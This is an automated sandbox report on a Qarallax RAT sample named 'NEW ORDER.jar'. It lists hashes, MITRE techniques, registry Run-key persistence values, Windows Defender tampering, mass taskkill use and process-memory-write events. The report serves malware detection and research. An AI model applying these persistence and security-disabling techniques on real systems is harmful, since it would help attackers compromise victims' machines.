qarallax | ac718fd470592d7ee950f0f6c53d0e170fa70a229ef9694c8863f9c1b52ebda4

Analysis

max time kernel
148s
max time network
170s
platform
windows7_x64
resource
win7
submitted
19-08-2020 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW ORDER.jar
Size

399KB
MD5

742703cc1772f82cd50660194d7c47a9
SHA1

6d1ec923aaa205a97cf5c0975b9a7d87a0fade9d
SHA256

ac718fd470592d7ee950f0f6c53d0e170fa70a229ef9694c8863f9c1b52ebda4
SHA512

c41908b802924f678c3ae31691e679d664deb9fd9074f5a9b8b6c296d085d1c3fb1b2bd0b83cf797af1e5e267d9bec33aff474a78ab5419d969062962a4e3e33

Score

10^/10

trojan qarallax persistence evasion

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x0003000000013528-7.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
1108	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\DsGIILk = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\FVKwo\\WbZqr.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\FVKwo\Desktop.ini	java.exe
File created	C:\Users\Admin\FVKwo\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\FVKwo\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\FVKwo\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\nGCzp	java.exe
File opened for modification	C:\Windows\System32\nGCzp	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
1684	taskkill.exe
484	taskkill.exe
1864	taskkill.exe
1532	taskkill.exe
1564	taskkill.exe
1636	taskkill.exe
744	taskkill.exe
1848	taskkill.exe
484	taskkill.exe
1228	taskkill.exe
1996	taskkill.exe
1556	taskkill.exe
1892	taskkill.exe
1812	taskkill.exe
268	taskkill.exe
1332	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1648	powershell.exe
1648	powershell.exe

Suspicious use of AdjustPrivilegeToken 97 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1068	WMIC.exe
Token: SeSecurityPrivilege	1068	WMIC.exe
Token: SeTakeOwnershipPrivilege	1068	WMIC.exe
Token: SeLoadDriverPrivilege	1068	WMIC.exe
Token: SeSystemProfilePrivilege	1068	WMIC.exe
Token: SeSystemtimePrivilege	1068	WMIC.exe
Token: SeProfSingleProcessPrivilege	1068	WMIC.exe
Token: SeIncBasePriorityPrivilege	1068	WMIC.exe
Token: SeCreatePagefilePrivilege	1068	WMIC.exe
Token: SeBackupPrivilege	1068	WMIC.exe
Token: SeRestorePrivilege	1068	WMIC.exe
Token: SeShutdownPrivilege	1068	WMIC.exe
Token: SeDebugPrivilege	1068	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1068	WMIC.exe
Token: SeRemoteShutdownPrivilege	1068	WMIC.exe
Token: SeUndockPrivilege	1068	WMIC.exe
Token: SeManageVolumePrivilege	1068	WMIC.exe
Token: 33	1068	WMIC.exe
Token: 34	1068	WMIC.exe
Token: 35	1068	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1472	WMIC.exe
Token: SeSecurityPrivilege	1472	WMIC.exe
Token: SeTakeOwnershipPrivilege	1472	WMIC.exe
Token: SeLoadDriverPrivilege	1472	WMIC.exe
Token: SeSystemProfilePrivilege	1472	WMIC.exe
Token: SeSystemtimePrivilege	1472	WMIC.exe
Token: SeProfSingleProcessPrivilege	1472	WMIC.exe
Token: SeIncBasePriorityPrivilege	1472	WMIC.exe
Token: SeCreatePagefilePrivilege	1472	WMIC.exe
Token: SeBackupPrivilege	1472	WMIC.exe
Token: SeRestorePrivilege	1472	WMIC.exe
Token: SeShutdownPrivilege	1472	WMIC.exe
Token: SeDebugPrivilege	1472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1472	WMIC.exe
Token: SeRemoteShutdownPrivilege	1472	WMIC.exe
Token: SeUndockPrivilege	1472	WMIC.exe
Token: SeManageVolumePrivilege	1472	WMIC.exe
Token: 33	1472	WMIC.exe
Token: 34	1472	WMIC.exe
Token: 35	1472	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1472	WMIC.exe
Token: SeSecurityPrivilege	1472	WMIC.exe
Token: SeTakeOwnershipPrivilege	1472	WMIC.exe
Token: SeLoadDriverPrivilege	1472	WMIC.exe
Token: SeSystemProfilePrivilege	1472	WMIC.exe
Token: SeSystemtimePrivilege	1472	WMIC.exe
Token: SeProfSingleProcessPrivilege	1472	WMIC.exe
Token: SeIncBasePriorityPrivilege	1472	WMIC.exe
Token: SeCreatePagefilePrivilege	1472	WMIC.exe
Token: SeBackupPrivilege	1472	WMIC.exe
Token: SeRestorePrivilege	1472	WMIC.exe
Token: SeShutdownPrivilege	1472	WMIC.exe
Token: SeDebugPrivilege	1472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1472	WMIC.exe
Token: SeRemoteShutdownPrivilege	1472	WMIC.exe
Token: SeUndockPrivilege	1472	WMIC.exe
Token: SeManageVolumePrivilege	1472	WMIC.exe
Token: 33	1472	WMIC.exe
Token: 34	1472	WMIC.exe
Token: 35	1472	WMIC.exe
Token: SeDebugPrivilege	1532	taskkill.exe
Token: SeDebugPrivilege	1684	taskkill.exe
Token: SeDebugPrivilege	484	taskkill.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	1848	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	744	taskkill.exe
Token: SeDebugPrivilege	484	taskkill.exe
Token: SeDebugPrivilege	268	taskkill.exe
Token: SeDebugPrivilege	1228	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	1864	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1108	java.exe

Suspicious use of WriteProcessMemory 753 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 748	1108	java.exe	25
PID 1108 wrote to memory of 748	1108	java.exe	25
PID 1108 wrote to memory of 748	1108	java.exe	25
PID 1108 wrote to memory of 388	1108	java.exe	26
PID 1108 wrote to memory of 388	1108	java.exe	26
PID 1108 wrote to memory of 388	1108	java.exe	26
PID 388 wrote to memory of 1068	388	cmd.exe	27
PID 388 wrote to memory of 1068	388	cmd.exe	27
PID 388 wrote to memory of 1068	388	cmd.exe	27
PID 1108 wrote to memory of 1512	1108	java.exe	28
PID 1108 wrote to memory of 1512	1108	java.exe	28
PID 1108 wrote to memory of 1512	1108	java.exe	28
PID 1512 wrote to memory of 1472	1512	cmd.exe	29
PID 1512 wrote to memory of 1472	1512	cmd.exe	29
PID 1512 wrote to memory of 1472	1512	cmd.exe	29
PID 1108 wrote to memory of 1820	1108	java.exe	30
PID 1108 wrote to memory of 1820	1108	java.exe	30
PID 1108 wrote to memory of 1820	1108	java.exe	30
PID 1108 wrote to memory of 1828	1108	java.exe	31
PID 1108 wrote to memory of 1828	1108	java.exe	31
PID 1108 wrote to memory of 1828	1108	java.exe	31
PID 1108 wrote to memory of 1868	1108	java.exe	32
PID 1108 wrote to memory of 1868	1108	java.exe	32
PID 1108 wrote to memory of 1868	1108	java.exe	32
PID 1108 wrote to memory of 1332	1108	java.exe	33
PID 1108 wrote to memory of 1332	1108	java.exe	33
PID 1108 wrote to memory of 1332	1108	java.exe	33
PID 1108 wrote to memory of 1792	1108	java.exe	34
PID 1108 wrote to memory of 1792	1108	java.exe	34
PID 1108 wrote to memory of 1792	1108	java.exe	34
PID 1108 wrote to memory of 1776	1108	java.exe	35
PID 1108 wrote to memory of 1776	1108	java.exe	35
PID 1108 wrote to memory of 1776	1108	java.exe	35
PID 1108 wrote to memory of 1784	1108	java.exe	36
PID 1108 wrote to memory of 1784	1108	java.exe	36
PID 1108 wrote to memory of 1784	1108	java.exe	36
PID 1108 wrote to memory of 1752	1108	java.exe	37
PID 1108 wrote to memory of 1752	1108	java.exe	37
PID 1108 wrote to memory of 1752	1108	java.exe	37
PID 1108 wrote to memory of 1648	1108	java.exe	38
PID 1108 wrote to memory of 1648	1108	java.exe	38
PID 1108 wrote to memory of 1648	1108	java.exe	38
PID 1108 wrote to memory of 1508	1108	java.exe	39
PID 1108 wrote to memory of 1508	1108	java.exe	39
PID 1108 wrote to memory of 1508	1108	java.exe	39
PID 1108 wrote to memory of 1532	1108	java.exe	40
PID 1108 wrote to memory of 1532	1108	java.exe	40
PID 1108 wrote to memory of 1532	1108	java.exe	40
PID 1108 wrote to memory of 1920	1108	java.exe	43
PID 1108 wrote to memory of 1920	1108	java.exe	43
PID 1108 wrote to memory of 1920	1108	java.exe	43
PID 1108 wrote to memory of 1916	1108	java.exe	44
PID 1108 wrote to memory of 1916	1108	java.exe	44
PID 1108 wrote to memory of 1916	1108	java.exe	44
PID 1508 wrote to memory of 2004	1508	cmd.exe	45
PID 1508 wrote to memory of 2004	1508	cmd.exe	45
PID 1508 wrote to memory of 2004	1508	cmd.exe	45
PID 1108 wrote to memory of 1996	1108	java.exe	46
PID 1108 wrote to memory of 1996	1108	java.exe	46
PID 1108 wrote to memory of 1996	1108	java.exe	46
PID 1108 wrote to memory of 1124	1108	java.exe	49
PID 1108 wrote to memory of 1124	1108	java.exe	49
PID 1108 wrote to memory of 1100	1108	java.exe	50
PID 1108 wrote to memory of 1124	1108	java.exe	49
PID 1108 wrote to memory of 1100	1108	java.exe	50
PID 1108 wrote to memory of 1100	1108	java.exe	50
PID 1108 wrote to memory of 888	1108	java.exe	51
PID 1108 wrote to memory of 888	1108	java.exe	51
PID 1108 wrote to memory of 888	1108	java.exe	51
PID 1108 wrote to memory of 340	1108	java.exe	52
PID 1108 wrote to memory of 340	1108	java.exe	52
PID 1108 wrote to memory of 340	1108	java.exe	52
PID 1108 wrote to memory of 1556	1108	java.exe	53
PID 1108 wrote to memory of 1556	1108	java.exe	53
PID 1108 wrote to memory of 1556	1108	java.exe	53
PID 1508 wrote to memory of 1464	1508	cmd.exe	54
PID 1508 wrote to memory of 1464	1508	cmd.exe	54
PID 1508 wrote to memory of 1464	1508	cmd.exe	54
PID 1108 wrote to memory of 268	1108	java.exe	55
PID 1108 wrote to memory of 268	1108	java.exe	55
PID 1108 wrote to memory of 268	1108	java.exe	55
PID 1108 wrote to memory of 1232	1108	java.exe	56
PID 1108 wrote to memory of 1232	1108	java.exe	56
PID 1108 wrote to memory of 1232	1108	java.exe	56
PID 1108 wrote to memory of 568	1108	java.exe	57
PID 1108 wrote to memory of 568	1108	java.exe	57
PID 1108 wrote to memory of 568	1108	java.exe	57
PID 1108 wrote to memory of 1520	1108	java.exe	58
PID 1108 wrote to memory of 1520	1108	java.exe	58
PID 1108 wrote to memory of 1520	1108	java.exe	58
PID 1108 wrote to memory of 1068	1108	java.exe	60
PID 1108 wrote to memory of 1068	1108	java.exe	60
PID 1108 wrote to memory of 1068	1108	java.exe	60
PID 1108 wrote to memory of 1708	1108	java.exe	62
PID 1108 wrote to memory of 1708	1108	java.exe	62
PID 1108 wrote to memory of 1708	1108	java.exe	62
PID 1108 wrote to memory of 1684	1108	java.exe	63
PID 1108 wrote to memory of 1684	1108	java.exe	63
PID 1108 wrote to memory of 1684	1108	java.exe	63
PID 1108 wrote to memory of 240	1108	java.exe	64
PID 1108 wrote to memory of 240	1108	java.exe	64
PID 1108 wrote to memory of 240	1108	java.exe	64
PID 1108 wrote to memory of 1844	1108	java.exe	65
PID 1108 wrote to memory of 1844	1108	java.exe	65
PID 1108 wrote to memory of 1844	1108	java.exe	65
PID 1108 wrote to memory of 1336	1108	java.exe	68
PID 1108 wrote to memory of 1336	1108	java.exe	68
PID 1108 wrote to memory of 1336	1108	java.exe	68
PID 1108 wrote to memory of 1800	1108	java.exe	70
PID 1108 wrote to memory of 1800	1108	java.exe	70
PID 1108 wrote to memory of 1800	1108	java.exe	70
PID 1068 wrote to memory of 1680	1068	cmd.exe	71
PID 1068 wrote to memory of 1680	1068	cmd.exe	71
PID 1068 wrote to memory of 1680	1068	cmd.exe	71
PID 1108 wrote to memory of 1636	1108	java.exe	72
PID 1108 wrote to memory of 1636	1108	java.exe	72
PID 1108 wrote to memory of 1636	1108	java.exe	72
PID 1108 wrote to memory of 1952	1108	java.exe	73
PID 1108 wrote to memory of 1952	1108	java.exe	73
PID 1108 wrote to memory of 1952	1108	java.exe	73
PID 1108 wrote to memory of 1048	1108	java.exe	76
PID 1108 wrote to memory of 1048	1108	java.exe	76
PID 1108 wrote to memory of 1048	1108	java.exe	76
PID 1068 wrote to memory of 1064	1068	cmd.exe	83
PID 1068 wrote to memory of 1064	1068	cmd.exe	83
PID 1068 wrote to memory of 1064	1068	cmd.exe	83
PID 1108 wrote to memory of 484	1108	java.exe	84
PID 1108 wrote to memory of 484	1108	java.exe	84
PID 1108 wrote to memory of 484	1108	java.exe	84
PID 1108 wrote to memory of 1752	1108	java.exe	87
PID 1108 wrote to memory of 1752	1108	java.exe	87
PID 1108 wrote to memory of 1752	1108	java.exe	87
PID 1752 wrote to memory of 1548	1752	cmd.exe	92
PID 1752 wrote to memory of 1548	1752	cmd.exe	92
PID 1752 wrote to memory of 1548	1752	cmd.exe	92
PID 1752 wrote to memory of 2040	1752	cmd.exe	95
PID 1752 wrote to memory of 2040	1752	cmd.exe	95
PID 1752 wrote to memory of 2040	1752	cmd.exe	95
PID 1108 wrote to memory of 1620	1108	java.exe	96
PID 1108 wrote to memory of 1620	1108	java.exe	96
PID 1108 wrote to memory of 1620	1108	java.exe	96
PID 1620 wrote to memory of 1836	1620	cmd.exe	97
PID 1620 wrote to memory of 1836	1620	cmd.exe	97
PID 1620 wrote to memory of 1836	1620	cmd.exe	97
PID 1620 wrote to memory of 1964	1620	cmd.exe	98
PID 1620 wrote to memory of 1964	1620	cmd.exe	98
PID 1620 wrote to memory of 1964	1620	cmd.exe	98
PID 1108 wrote to memory of 1972	1108	java.exe	99
PID 1108 wrote to memory of 1972	1108	java.exe	99
PID 1108 wrote to memory of 1972	1108	java.exe	99
PID 1108 wrote to memory of 1848	1108	java.exe	100
PID 1108 wrote to memory of 1848	1108	java.exe	100
PID 1108 wrote to memory of 1848	1108	java.exe	100
PID 1972 wrote to memory of 2028	1972	cmd.exe	101
PID 1972 wrote to memory of 2028	1972	cmd.exe	101
PID 1972 wrote to memory of 2028	1972	cmd.exe	101
PID 1972 wrote to memory of 1064	1972	cmd.exe	102
PID 1972 wrote to memory of 1064	1972	cmd.exe	102
PID 1972 wrote to memory of 1064	1972	cmd.exe	102
PID 1108 wrote to memory of 108	1108	java.exe	104
PID 1108 wrote to memory of 108	1108	java.exe	104
PID 1108 wrote to memory of 108	1108	java.exe	104
PID 108 wrote to memory of 1920	108	cmd.exe	105
PID 108 wrote to memory of 1920	108	cmd.exe	105
PID 108 wrote to memory of 1920	108	cmd.exe	105
PID 108 wrote to memory of 904	108	cmd.exe	106
PID 108 wrote to memory of 904	108	cmd.exe	106
PID 108 wrote to memory of 904	108	cmd.exe	106
PID 1108 wrote to memory of 1560	1108	java.exe	107
PID 1108 wrote to memory of 1560	1108	java.exe	107
PID 1108 wrote to memory of 1560	1108	java.exe	107
PID 1560 wrote to memory of 1276	1560	cmd.exe	108
PID 1560 wrote to memory of 1276	1560	cmd.exe	108
PID 1560 wrote to memory of 1276	1560	cmd.exe	108
PID 1560 wrote to memory of 1900	1560	cmd.exe	109
PID 1560 wrote to memory of 1900	1560	cmd.exe	109
PID 1560 wrote to memory of 1900	1560	cmd.exe	109
PID 1108 wrote to memory of 1772	1108	java.exe	110
PID 1108 wrote to memory of 1772	1108	java.exe	110
PID 1108 wrote to memory of 1772	1108	java.exe	110
PID 1772 wrote to memory of 1892	1772	cmd.exe	111
PID 1772 wrote to memory of 1892	1772	cmd.exe	111
PID 1772 wrote to memory of 1892	1772	cmd.exe	111
PID 1772 wrote to memory of 1784	1772	cmd.exe	112
PID 1772 wrote to memory of 1784	1772	cmd.exe	112
PID 1772 wrote to memory of 1784	1772	cmd.exe	112
PID 1108 wrote to memory of 1496	1108	java.exe	113
PID 1108 wrote to memory of 1496	1108	java.exe	113
PID 1108 wrote to memory of 1496	1108	java.exe	113
PID 1108 wrote to memory of 1812	1108	java.exe	114
PID 1108 wrote to memory of 1812	1108	java.exe	114
PID 1108 wrote to memory of 1812	1108	java.exe	114
PID 1496 wrote to memory of 2008	1496	cmd.exe	115
PID 1496 wrote to memory of 2008	1496	cmd.exe	115
PID 1496 wrote to memory of 2008	1496	cmd.exe	115
PID 1496 wrote to memory of 1448	1496	cmd.exe	116
PID 1496 wrote to memory of 1448	1496	cmd.exe	116
PID 1496 wrote to memory of 1448	1496	cmd.exe	116
PID 1108 wrote to memory of 1992	1108	java.exe	118
PID 1108 wrote to memory of 1992	1108	java.exe	118
PID 1108 wrote to memory of 1992	1108	java.exe	118
PID 1992 wrote to memory of 1520	1992	cmd.exe	119
PID 1992 wrote to memory of 1520	1992	cmd.exe	119
PID 1992 wrote to memory of 1520	1992	cmd.exe	119
PID 1992 wrote to memory of 1336	1992	cmd.exe	120
PID 1992 wrote to memory of 1336	1992	cmd.exe	120
PID 1992 wrote to memory of 1336	1992	cmd.exe	120
PID 1108 wrote to memory of 1800	1108	java.exe	121
PID 1108 wrote to memory of 1800	1108	java.exe	121
PID 1108 wrote to memory of 1800	1108	java.exe	121
PID 1800 wrote to memory of 1700	1800	cmd.exe	122
PID 1800 wrote to memory of 1700	1800	cmd.exe	122
PID 1800 wrote to memory of 1700	1800	cmd.exe	122
PID 1800 wrote to memory of 268	1800	cmd.exe	123
PID 1800 wrote to memory of 268	1800	cmd.exe	123
PID 1800 wrote to memory of 268	1800	cmd.exe	123
PID 1108 wrote to memory of 316	1108	java.exe	124
PID 1108 wrote to memory of 316	1108	java.exe	124
PID 1108 wrote to memory of 316	1108	java.exe	124
PID 316 wrote to memory of 2000	316	cmd.exe	125
PID 316 wrote to memory of 2000	316	cmd.exe	125
PID 316 wrote to memory of 2000	316	cmd.exe	125
PID 316 wrote to memory of 1464	316	cmd.exe	126
PID 316 wrote to memory of 1464	316	cmd.exe	126
PID 316 wrote to memory of 1464	316	cmd.exe	126
PID 1108 wrote to memory of 1048	1108	java.exe	127
PID 1108 wrote to memory of 1048	1108	java.exe	127
PID 1108 wrote to memory of 1048	1108	java.exe	127
PID 1048 wrote to memory of 788	1048	cmd.exe	128
PID 1048 wrote to memory of 788	1048	cmd.exe	128
PID 1048 wrote to memory of 788	1048	cmd.exe	128
PID 1048 wrote to memory of 1112	1048	cmd.exe	129
PID 1048 wrote to memory of 1112	1048	cmd.exe	129
PID 1048 wrote to memory of 1112	1048	cmd.exe	129
PID 1108 wrote to memory of 1868	1108	java.exe	130
PID 1108 wrote to memory of 1868	1108	java.exe	130
PID 1108 wrote to memory of 1868	1108	java.exe	130
PID 1868 wrote to memory of 1220	1868	cmd.exe	131
PID 1868 wrote to memory of 1220	1868	cmd.exe	131
PID 1868 wrote to memory of 1220	1868	cmd.exe	131
PID 1868 wrote to memory of 1912	1868	cmd.exe	132
PID 1868 wrote to memory of 1912	1868	cmd.exe	132
PID 1868 wrote to memory of 1912	1868	cmd.exe	132
PID 1108 wrote to memory of 1792	1108	java.exe	133
PID 1108 wrote to memory of 1792	1108	java.exe	133
PID 1108 wrote to memory of 1792	1108	java.exe	133
PID 1792 wrote to memory of 1820	1792	cmd.exe	134
PID 1792 wrote to memory of 1820	1792	cmd.exe	134
PID 1792 wrote to memory of 1820	1792	cmd.exe	134
PID 1792 wrote to memory of 1372	1792	cmd.exe	135
PID 1792 wrote to memory of 1372	1792	cmd.exe	135
PID 1792 wrote to memory of 1372	1792	cmd.exe	135
PID 1108 wrote to memory of 1564	1108	java.exe	136
PID 1108 wrote to memory of 1564	1108	java.exe	136
PID 1108 wrote to memory of 1564	1108	java.exe	136
PID 1108 wrote to memory of 1920	1108	java.exe	137
PID 1108 wrote to memory of 1920	1108	java.exe	137
PID 1108 wrote to memory of 1920	1108	java.exe	137
PID 1920 wrote to memory of 1324	1920	cmd.exe	139
PID 1920 wrote to memory of 1324	1920	cmd.exe	139
PID 1920 wrote to memory of 1324	1920	cmd.exe	139
PID 1920 wrote to memory of 388	1920	cmd.exe	140
PID 1920 wrote to memory of 388	1920	cmd.exe	140
PID 1920 wrote to memory of 388	1920	cmd.exe	140
PID 1108 wrote to memory of 1276	1108	java.exe	141
PID 1108 wrote to memory of 1276	1108	java.exe	141
PID 1108 wrote to memory of 1276	1108	java.exe	141
PID 1276 wrote to memory of 1816	1276	cmd.exe	142
PID 1276 wrote to memory of 1816	1276	cmd.exe	142
PID 1276 wrote to memory of 1816	1276	cmd.exe	142
PID 1276 wrote to memory of 1872	1276	cmd.exe	143
PID 1276 wrote to memory of 1872	1276	cmd.exe	143
PID 1276 wrote to memory of 1872	1276	cmd.exe	143
PID 1108 wrote to memory of 1944	1108	java.exe	144
PID 1108 wrote to memory of 1944	1108	java.exe	144
PID 1108 wrote to memory of 1944	1108	java.exe	144
PID 1944 wrote to memory of 1940	1944	cmd.exe	145
PID 1944 wrote to memory of 1940	1944	cmd.exe	145
PID 1944 wrote to memory of 1940	1944	cmd.exe	145
PID 1944 wrote to memory of 744	1944	cmd.exe	146
PID 1944 wrote to memory of 744	1944	cmd.exe	146
PID 1944 wrote to memory of 744	1944	cmd.exe	146
PID 1108 wrote to memory of 1556	1108	java.exe	147
PID 1108 wrote to memory of 1556	1108	java.exe	147
PID 1108 wrote to memory of 1556	1108	java.exe	147
PID 1556 wrote to memory of 1620	1556	cmd.exe	148
PID 1556 wrote to memory of 1620	1556	cmd.exe	148
PID 1556 wrote to memory of 1620	1556	cmd.exe	148
PID 1556 wrote to memory of 1768	1556	cmd.exe	149
PID 1556 wrote to memory of 1768	1556	cmd.exe	149
PID 1556 wrote to memory of 1768	1556	cmd.exe	149
PID 1108 wrote to memory of 1684	1108	java.exe	150
PID 1108 wrote to memory of 1684	1108	java.exe	150
PID 1108 wrote to memory of 1684	1108	java.exe	150
PID 1684 wrote to memory of 1052	1684	cmd.exe	151
PID 1684 wrote to memory of 1052	1684	cmd.exe	151
PID 1684 wrote to memory of 1052	1684	cmd.exe	151
PID 1684 wrote to memory of 1336	1684	cmd.exe	152
PID 1684 wrote to memory of 1336	1684	cmd.exe	152
PID 1684 wrote to memory of 1336	1684	cmd.exe	152
PID 1108 wrote to memory of 1908	1108	java.exe	153
PID 1108 wrote to memory of 1908	1108	java.exe	153
PID 1108 wrote to memory of 1908	1108	java.exe	153
PID 1108 wrote to memory of 1636	1108	java.exe	154
PID 1108 wrote to memory of 1636	1108	java.exe	154
PID 1108 wrote to memory of 1636	1108	java.exe	154
PID 1908 wrote to memory of 1812	1908	cmd.exe	155
PID 1908 wrote to memory of 1812	1908	cmd.exe	155
PID 1908 wrote to memory of 1812	1908	cmd.exe	155
PID 1908 wrote to memory of 368	1908	cmd.exe	157
PID 1908 wrote to memory of 368	1908	cmd.exe	157
PID 1908 wrote to memory of 368	1908	cmd.exe	157
PID 1108 wrote to memory of 1044	1108	java.exe	158
PID 1108 wrote to memory of 1044	1108	java.exe	158
PID 1108 wrote to memory of 1044	1108	java.exe	158
PID 1044 wrote to memory of 1112	1044	cmd.exe	159
PID 1044 wrote to memory of 1112	1044	cmd.exe	159
PID 1044 wrote to memory of 1112	1044	cmd.exe	159
PID 1044 wrote to memory of 2028	1044	cmd.exe	160
PID 1044 wrote to memory of 2028	1044	cmd.exe	160
PID 1044 wrote to memory of 2028	1044	cmd.exe	160
PID 1108 wrote to memory of 1912	1108	java.exe	161
PID 1108 wrote to memory of 1912	1108	java.exe	161
PID 1108 wrote to memory of 1912	1108	java.exe	161
PID 1912 wrote to memory of 484	1912	cmd.exe	162
PID 1912 wrote to memory of 484	1912	cmd.exe	162
PID 1912 wrote to memory of 484	1912	cmd.exe	162
PID 1912 wrote to memory of 1372	1912	cmd.exe	163
PID 1912 wrote to memory of 1372	1912	cmd.exe	163
PID 1912 wrote to memory of 1372	1912	cmd.exe	163
PID 1108 wrote to memory of 816	1108	java.exe	164
PID 1108 wrote to memory of 816	1108	java.exe	164
PID 1108 wrote to memory of 816	1108	java.exe	164
PID 816 wrote to memory of 1544	816	cmd.exe	165
PID 816 wrote to memory of 1544	816	cmd.exe	165
PID 816 wrote to memory of 1544	816	cmd.exe	165
PID 816 wrote to memory of 388	816	cmd.exe	166
PID 816 wrote to memory of 388	816	cmd.exe	166
PID 816 wrote to memory of 388	816	cmd.exe	166
PID 1108 wrote to memory of 1876	1108	java.exe	167
PID 1108 wrote to memory of 1876	1108	java.exe	167
PID 1108 wrote to memory of 1876	1108	java.exe	167
PID 1876 wrote to memory of 1472	1876	cmd.exe	168
PID 1876 wrote to memory of 1472	1876	cmd.exe	168
PID 1876 wrote to memory of 1472	1876	cmd.exe	168
PID 1876 wrote to memory of 1816	1876	cmd.exe	169
PID 1876 wrote to memory of 1816	1876	cmd.exe	169
PID 1876 wrote to memory of 1816	1876	cmd.exe	169
PID 1108 wrote to memory of 1796	1108	java.exe	170
PID 1108 wrote to memory of 1796	1108	java.exe	170
PID 1108 wrote to memory of 1796	1108	java.exe	170
PID 1796 wrote to memory of 1780	1796	cmd.exe	171
PID 1796 wrote to memory of 1780	1796	cmd.exe	171
PID 1796 wrote to memory of 1780	1796	cmd.exe	171
PID 1796 wrote to memory of 1848	1796	cmd.exe	172
PID 1796 wrote to memory of 1848	1796	cmd.exe	172
PID 1796 wrote to memory of 1848	1796	cmd.exe	172
PID 1108 wrote to memory of 2008	1108	java.exe	173
PID 1108 wrote to memory of 2008	1108	java.exe	173
PID 1108 wrote to memory of 2008	1108	java.exe	173
PID 1108 wrote to memory of 744	1108	java.exe	174
PID 1108 wrote to memory of 744	1108	java.exe	174
PID 1108 wrote to memory of 744	1108	java.exe	174
PID 2008 wrote to memory of 1772	2008	cmd.exe	176
PID 2008 wrote to memory of 1772	2008	cmd.exe	176
PID 2008 wrote to memory of 1772	2008	cmd.exe	176
PID 2008 wrote to memory of 1548	2008	cmd.exe	177
PID 2008 wrote to memory of 1548	2008	cmd.exe	177
PID 2008 wrote to memory of 1548	2008	cmd.exe	177
PID 1108 wrote to memory of 1076	1108	java.exe	178
PID 1108 wrote to memory of 1076	1108	java.exe	178
PID 1108 wrote to memory of 1076	1108	java.exe	178
PID 1076 wrote to memory of 1520	1076	cmd.exe	179
PID 1076 wrote to memory of 1520	1076	cmd.exe	179
PID 1076 wrote to memory of 1520	1076	cmd.exe	179
PID 1076 wrote to memory of 1052	1076	cmd.exe	180
PID 1076 wrote to memory of 1052	1076	cmd.exe	180
PID 1076 wrote to memory of 1052	1076	cmd.exe	180
PID 1108 wrote to memory of 1828	1108	java.exe	181
PID 1108 wrote to memory of 1828	1108	java.exe	181
PID 1108 wrote to memory of 1828	1108	java.exe	181
PID 1828 wrote to memory of 1088	1828	cmd.exe	182
PID 1828 wrote to memory of 1088	1828	cmd.exe	182
PID 1828 wrote to memory of 1088	1828	cmd.exe	182
PID 1828 wrote to memory of 884	1828	cmd.exe	183
PID 1828 wrote to memory of 884	1828	cmd.exe	183
PID 1828 wrote to memory of 884	1828	cmd.exe	183
